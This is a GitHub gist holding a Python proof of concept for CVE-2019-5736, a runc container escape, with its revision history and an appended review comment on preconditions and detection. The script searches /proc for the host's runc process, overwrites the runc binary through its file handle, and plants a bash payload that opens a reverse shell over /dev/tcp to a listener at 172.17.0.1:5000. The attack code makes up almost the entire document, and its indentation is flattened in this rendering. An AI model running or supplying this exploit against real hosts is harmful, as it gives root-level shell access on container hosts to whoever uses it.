

@singe
Last active June 30, 2025 09:54

Revisions

  1. singe revised this gist Feb 12, 2019. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion cve-2019-5736.py
    @@ -1,5 +1,5 @@
    #!/bin/python3
    # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @frichette_n & @_cablethief)
    # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
    # Target will need a python3 interpreter
    # Edit IP info below, on the host run a netcat to catch the reverse shell
    # Run this python file in the container
  2. singe created this gist Feb 12, 2019.
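--- a/cve-2019-5736.py
+++ b/cve-2019-5736.py
@@ -0,0 +1,57 @@
+#!/bin/python3
+# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @frichette_n & @_cablethief)
+# Target will need a python3 interpreter
+# Edit IP info below, on the host run a netcat to catch the reverse shell
+# Run this python file in the container
+# Then from the host: docker exec -i <container name> /tmp/evil
+import os
+import stat
+
+host='172.17.0.1'
+port='5000'
+payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
+target_file='/tmp/evil'
+
+if __name__ == '__main__':
+
+with open(target_file,'w') as evil:
+evil.write('#!/proc/self/exe --criu')
+os.chmod(target_file,stat.S_IXOTH)
+
+found = 0
+while found == 0:
+procs = os.popen('ps -A -o pid')
+for pid in procs:
+pid = pid.strip()
+if pid == 'PID': continue
+if int(pid) > os.getpid():
+try:
+with open(f'/proc/{pid}/cmdline','r') as cmdline:
+if cmdline.read().find('runc') >= 0:
+found = pid
+except FileNotFoundError:
+continue
+except ProcessLookupError:
+continue
+
+handle = -1
+while handle == -1:
+try:
+handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit
+except FileNotFoundError:
+continue
+except PermissionError:
+continue
+print('Got file handle')
+write_handle = 0;
+while write_handle == 0:
+try:
+write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC)
+except OSError:
+continue
+print('Got write handle')
+result = os.write(write_handle,str.encode(payload))
+if result == len(payload):
+print('Successfully wrote payload')
+else:
+print('Could not write')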
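Review bot: The header comments (`# Target will need a python3 interpreter` through `# Then from the host: ...`) never state the precondition the whole script rests on: the host's runc must predate the CVE-2019-5736 fix, which is what the `os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC)` line depends on — a patched runc re-executes from a sealed in-memory copy of its own binary, so that write-open is presumably refused with an OSError and the `while write_handle == 0:` loop never terminates. I would add `# Only affects hosts running runc without the CVE-2019-5736 fix (re-exec from a sealed in-memory copy); on patched runc the write-open below fails and this spins forever` directly under the shebang. From a detection standpoint the observable steps are the `/proc/{pid}/cmdline` sweep looking for a `runc` process and the O_PATH open of `/proc/{found}/exe` from inside the container, which is what file-access auditing on `/proc/*/exe` and read-only/immutable runc binaries key on; the three busy-wait `while` loops are also a plain CPU signal. The indentation of the `if __name__ == '__main__':` body is lost in this rendered view, so its nesting cannot be checked from here.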